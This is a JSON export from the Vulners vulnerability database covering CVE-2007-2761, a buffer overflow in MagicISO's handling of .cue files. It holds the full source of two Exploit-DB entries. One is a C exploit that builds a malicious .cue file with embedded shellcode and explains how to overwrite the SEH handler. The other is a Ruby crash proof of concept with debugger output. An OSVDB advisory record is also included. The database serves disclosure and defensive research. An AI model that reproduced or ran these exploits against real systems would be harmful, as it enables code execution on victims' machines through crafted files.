Vulners, 2018

{"exploitdb": [{"lastseen": "2016-01-31T19:44:36", "osvdbidlist": ["36077"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MagicISO. CVE-2007-2761. Local exploit for windows platform", "reporter": "vade79", "published": "2007-05-23T00:00:00", "type": "exploitdb", "title": "MagicISO <= 5.4 build239 .cue File Local Buffer Overflow Exploit", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2761"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-23T00:00:00", "id": "EDB-ID:3975", "href": "https://www.exploit-db.com/exploits/3975/", "sourceData": "/*\r\n-- poc/demo for magiciso exploit, found by n00b\r\n-- by: v9@fakehalo.us\r\n\r\n-- original email reply comments:\r\n\r\nI actually looked into this when you posted this on milw0rm. I was able to get it to run arbitrary code, however it was so unreliable it wasn't worth me posting... however, it was informative.\r\n\r\nyou have control of several registers, however it's eax and edx(not ecx) that are most interesting... the next instructions that get called(and fault magiciso) are:\r\n\r\nMOV DWORD PTR DS:[EDX],EAX\r\nMOV DWORD PTR DS:[EAX+4],EDX\r\n\r\n...now, with that you can overwrite any 4byte area in memory with anything you want. the problem is you can't use null bytes(which is where the shellcode and the current SEH handler is(non-PEB)) in this situation. (and the 2nd MOV can trigger an exception, which you will want to overwrite the handler of)\r\n\r\nyou can possibly use other methods, like you mentioned(although i didnt try for this situation), but i chose to write SEH handler for that block (if you trigger it with a bunch of x's it will show up right under it in ollydbg)\r\n\r\nstep 1 for making the 0x00?????? (EDX) nullbyte:\r\nyou can just so happen to happen to overwrite this buffer with full control until the end of the buffer. 
so, when most (C) functions write to a buffer they will cap it with an 0x00 on the end, i just used that. so the overflow has to be an EXACT size for that to work.\r\n\r\nstep 2 for making the 0x00?????? (EAX) nullbyte:\r\nonce i had control of where i was writing EAX to (EDX), i had to figure out a way to make another nullbyte as that is where the shellcode was located. to do this i came up with overwriting the SEH handler off-by-one, overwriting a single throw-away byte into another memory address(that would never be used), and leaving the original null-byte that was already there.\r\n\r\nthe downside to this is there is there was nothing left to keep track of where the shellcode was, ie a simple CALL reg wasn't possible as by the time i gained control of EIP there was no trace of where i was...so it became a blind guess, and memory gets pretty scattered...never the less, it is exploitable, and i popped up several calc.exe's when testing :)\r\n\r\neven if not reliable, i found it an interesting workaround for null-bytes. 
carry on if you like, here's the code i was using to test(which is functional, just not reliable):\r\n\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#ifndef __USE_BSD\r\n#define __USE_BSD\r\n#endif\r\n#include <string.h>\r\n#include <strings.h>\r\n#include <signal.h>\r\n#include <unistd.h>\r\n#include <getopt.h>\r\n\r\n/* winXP SP2 home (24bit, the first byte(0x00) will not be used) */\r\n#define DFL_EAX 0xfd3ddd\r\n#define DFL_EDX 0x12fb37\r\n\r\n/* win32_exec - EXITFUNC=process CMD=calc.exe Size=164 */\r\n/* Encoder=PexFnstenvSub http://metasploit.com */\r\nstatic unsigned char x86_exec[] =\r\n\"\\x29\\xc9\\x83\\xe9\\xdd\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\x23\"\r\n\"\\x75\\xbf\\x4a\\x83\\xeb\\xfc\\xe2\\xf4\\xdf\\x9d\\xfb\\x4a\\x23\\x75\\x34\\x0f\"\r\n\"\\x1f\\xfe\\xc3\\x4f\\x5b\\x74\\x50\\xc1\\x6c\\x6d\\x34\\x15\\x03\\x74\\x54\\x03\"\r\n\"\\xa8\\x41\\x34\\x4b\\xcd\\x44\\x7f\\xd3\\x8f\\xf1\\x7f\\x3e\\x24\\xb4\\x75\\x47\"\r\n\"\\x22\\xb7\\x54\\xbe\\x18\\x21\\x9b\\x4e\\x56\\x90\\x34\\x15\\x07\\x74\\x54\\x2c\"\r\n\"\\xa8\\x79\\xf4\\xc1\\x7c\\x69\\xbe\\xa1\\xa8\\x69\\x34\\x4b\\xc8\\xfc\\xe3\\x6e\"\r\n\"\\x27\\xb6\\x8e\\x8a\\x47\\xfe\\xff\\x7a\\xa6\\xb5\\xc7\\x46\\xa8\\x35\\xb3\\xc1\"\r\n\"\\x53\\x69\\x12\\xc1\\x4b\\x7d\\x54\\x43\\xa8\\xf5\\x0f\\x4a\\x23\\x75\\x34\\x22\"\r\n\"\\x1f\\x2a\\x8e\\xbc\\x43\\x23\\x36\\xb2\\xa0\\xb5\\xc4\\x1a\\x4b\\x0b\\x67\\xa8\"\r\n\"\\x50\\x1d\\x27\\xb4\\xa9\\x7b\\xe8\\xb5\\xc4\\x16\\xde\\x26\\x40\\x5b\\xda\\x32\"\r\n\"\\x46\\x75\\xbf\\x4a\";\r\n\r\nstruct{\r\n unsigned int eax;\r\n unsigned int edx;\r\n char *file;\r\n char *dir;\r\n}tbl;\r\n\r\n/* lonely extern. */\r\nextern char *optarg;\r\n\r\n/* functions. */\r\nunsigned char write_cue(char *,unsigned int,unsigned int);\r\nvoid printe(char *,short);\r\nvoid usage(char *);\r\n\r\n/* start. 
*/\r\nint main(int argc,char **argv){\r\n signed int chr=0;\r\n char *ptr;\r\n\r\n printf(\"[*] magiciso[v5.4/build 0239]: buffer overflow exploit.\\n\"\r\n \"[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)\\n\"\r\n \"[*] found by: n00b\\n\\n\");\r\n\r\n tbl.eax=DFL_EAX;\r\n tbl.edx=DFL_EDX;\r\n\r\n while((chr=getopt(argc,argv,\"m:a:d:\"))!=EOF){\r\n switch(chr){\r\n case 'm':\r\n if(!tbl.dir){\r\n if(!(ptr=rindex(optarg,'/')))\r\n ptr=optarg;\r\n else ptr++;\r\n if(!(tbl.dir=(char *)strdup(optarg)))\r\n printe(\"main(): allocating memory failed\",1);\r\n if(!(tbl.file=(char *)malloc(strlen(ptr)+5)))\r\n printe(\"main(): allocating memory failed\",1);\r\n sprintf(tbl.file,\"%s.cue\",ptr); \r\n }\r\n break;\r\n case 'a':\r\n sscanf(optarg,\"%x\",&tbl.eax);\r\n break;\r\n case 'd':\r\n sscanf(optarg,\"%x\",&tbl.edx);\r\n break;\r\n default:\r\n usage(argv[0]);\r\n break;\r\n }\r\n }\r\n\r\n if(((tbl.eax&0xff000000)>>24))\r\n printe(\"EAX address isn't 24bit/3 bytes.\",1);\r\n if(((tbl.edx&0xff000000)>>24))\r\n printe(\"EDX address isn't 24bit/3 bytes.\",1);\r\n\r\n if(!tbl.file)usage(argv[0]);\r\n\r\n printf(\"[*] directory:\\t\\t\\t%s\\n\",tbl.dir);\r\n printf(\"[*] filename:\\t\\t\\t%s/%s\\n\",tbl.dir,tbl.file);\r\n printf(\"[*] EAX address:\\t\\t0x[00]%.6x\\n\",tbl.eax);\r\n printf(\"[*] EDX address:\\t\\t0x[00]%.6x\\n\\n\",tbl.edx);\r\n\r\n if(mkdir(tbl.dir,0755))\r\n printe(\"failed to make directory.\",1);\r\n if(chdir(tbl.dir))\r\n printe(\"failed to chdir to new directory.\",1);\r\n\r\n if(write_cue(tbl.file,tbl.eax,tbl.edx))\r\n printe(\"failed to write to file.\",1);\r\n\r\n exit(0);\r\n}\r\n\r\n/* write the .cue file. */\r\nunsigned char write_cue(char *file,unsigned int eax,unsigned int edx){\r\n unsigned int i=0;\r\n unsigned int real_eax=eax-4;\r\n unsigned char filler='x';\r\n unsigned char nop=0x90;\r\n FILE *fs;\r\n if(!(fs=fopen(file, \"wb\")))return(1);\r\n\r\n /* the \"C:\" is to make the overflowed buffer a static size. 
*/\r\n fprintf(fs,\"FILE \\\"C:\");\r\n for(i=0;i<1022;i++){\r\n fwrite(&filler,1,1,fs);\r\n }\r\n\r\n /* this is an unused byte, the off-by-one write that keeps */\r\n /* the original null-byte in the SEH handler making this written */\r\n /* to one byte above the SEH handler. (fills in EAX) */\r\n fwrite(&filler,1,1,fs);\r\n\r\n fwrite(&tbl.eax,3,1,fs);\r\n fwrite(&tbl.edx,3,1,fs);\r\n\r\n /* --- */\r\n /* overflown buffer stops here, putting a null-byte on */ \r\n /* the end of the string to keep the null-byte for EDX */\r\n\r\n fprintf(fs,\"\\\" BINARY\\nTRACK 01 MODE1/2355\\nINDEX 01 00:00:00\\n\");\r\n\r\n /* simply throwing the nops/shellcode into memory at the end of the file. */\r\n for(i=0;i<500;i++){\r\n fwrite(&nop,1,1,fs);\r\n }\r\n fwrite(&x86_exec,sizeof(x86_exec),1,fs);\r\n\r\n fclose(fs);\r\n return(0);\r\n}\r\n\r\n/* error! */\r\nvoid printe(char *err,short e){\r\n printf(\"[!] %s\\n\",err);\r\n if(e)exit(1);\r\n return;\r\n}\r\n\r\n/* usage. */\r\nvoid usage(char *progname){\r\n printf(\"syntax: %s [-ad] -m directory\\n\\n\",progname);\r\n printf(\" -m <dir>\\tdirectory to make and output .cue to.\\n\");\r\n printf(\" -a <addr>\\tEAX address, will become the SEH handler\"\r\n \" (0x[00]%.6x)\\n\",tbl.eax);\r\n printf(\" -d <addr>\\tEDX address, points to where the SEH handler is\"\r\n \" (0x[00]%.6x)\\n\\n\",tbl.edx);\r\n exit(0);\r\n}\r\n\r\n// milw0rm.com [2007-05-23]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3975/"}, {"lastseen": "2016-01-31T19:40:27", "osvdbidlist": ["36077"], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "MagicISO. CVE-2007-2761. 
Dos exploit for linux platform", "reporter": "n00b", "published": "2007-05-17T00:00:00", "type": "exploitdb", "title": "MagicISO <= 5.4 build239 - .cue Heap Overflow PoC", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2007-2761"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2007-05-17T00:00:00", "id": "EDB-ID:3945", "href": "https://www.exploit-db.com/exploits/3945/", "sourceData": "#!/usr/bin/env ruby\r\n###################################\r\n#Credits to n00b for finding this bug.\r\n#Magic iso has a stacked based buffer over-flow when \r\n#We pass an overly-long file name inside the .cue file\r\n#We are able to control alot of the registers so\r\n#Command execution is possible,But im still learning \r\n#Which means this will get released as a dos poc for \r\n#now till i can get the help i need..Any way i will provide \r\n#The dubug info for you to see for your self..If any one \r\n#Decides to write a Local exploit for this please give \r\n#Credits to n00b..Ok on with the work of info collecting.\r\n#Vendor : http://www.magiciso.com/\r\n#Tested on win xp sp2.\r\n#I would also like to thank the people i emailed and pm about this\r\n#Shouts: ~ Str0ke ~ Marsu ~ SM ~ Aelphaeis ~ vade79\r\n# Thanx to all you guys who helped.\r\n###################################\r\n#...Debug info..\r\n# Program received signal SIGSEGV, Segmentation fault.\r\n# [Switching to thread 1092.0x314]\r\n# 0x0058f05e in ?? 
()\r\n# (gdb) i r\r\n# eax 0x41414141 1094795585\r\n# ecx 0x41414141 1094795585\r\n# edx 0x41414141 1094795585\r\n# ebx 0x41414545 1094796613\r\n# esp 0x12f5c8 0x12f5c8\r\n# ebp 0x12f5ec 0x12f5ec\r\n# esi 0xf4e718 16049944\r\n# edi 0xf4eb1c 16050972\r\n# eip 0x58f05e 0x58f05e\r\n# eflags 0x10206 66054\r\n# cs 0x1b 27\r\n# ss 0x23 35\r\n# ds 0x23 35\r\n# es 0x23 35\r\n# fs 0x3b 59\r\n# gs 0x0 0\r\n# fctrl 0xffff1273 -60813\r\n# fstat 0xffff0000 -65536\r\n# ftag 0xffffffff -1\r\n# fiseg 0x0 0\r\n# fioff 0x0 0\r\n# foseg 0xffff0000 -65536\r\n# fooff 0x0 0\r\n# ---Type <return> to continue, or q <return> to quit---\r\n# fop 0x0 0\r\n# (gdb)\r\n###################################\r\n#As you can see from the debug info we control eax ecx edx..\r\n#The two registers shown, EAX and ECX, can be populated with user supplied addresses which are a part of the data that \r\n#is used to overflow the heap buffer. One of the address can be of a function pointer which needs to be overwritten, for \r\n#example UEF and the other can be address of user supplied code that needs to be executed.\r\n\r\n$VERBOSE=nil #~ Shut the fuck up Let me do it my way ruby's over-zealous warnings..\r\n\r\nHeader1 = \r\n \"\\x46\\x49\\x4c\\x45\\x20\\x22\"\r\n\r\n\r\nBof = 'A'* 2024\r\n\r\nHeader2 = \"\\x2e\\x42\\x49\\x4e\\x22\\x20\\x42\\x49\\x4e\\x41\\x52\\x59\\x0d\\x0a\\x20\"+\r\n \"\\x54\\x52\\x41\\x43\\x4b\\x20\\x30\\x31\\x20\\x4d\\x4f\\x44\\x45\\x31\\x2f\\x32\"+\r\n \"\\x33\\x35\\x32\\x0d\\x0a\\x20\\x20\\x20\\x49\\x4e\\x44\\x45\\x58\\x20\\x30\\x31\"+\r\n \"\\x20\\x30\\x30\\x3a\\x30\\x30\\x3a\\x30\\x30\"\r\n\r\nn00b = Header1 + Bof + Header2\r\n \r\nFile.open( \"MagicISO.cue\", \"w\" ) do |the_file|\r\n\r\nthe_file.puts (n00b)\r\n\r\nend\r\n\r\n# milw0rm.com [2007-05-17]\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/3945/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "references": [], 
"description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:25325](https://secuniaresearch.flexerasoftware.com/advisories/25325/)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-05/0340.html\nISS X-Force ID: 34346\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3945\nFrSIRT Advisory: ADV-2007-1865\n[CVE-2007-2761](https://vulners.com/cve/CVE-2007-2761)\nBugtraq ID: 24029\n", "edition": 1, "reporter": "OSVDB", "published": "2007-05-18T06:48:57", "title": "MagicISO Maker CUE Filename Handling Memory Corruption", "type": "osvdb", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2007-2761"], "modified": "2007-05-18T06:48:57", "href": "https://vulners.com/osvdb/OSVDB:36077", "id": "OSVDB:36077", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}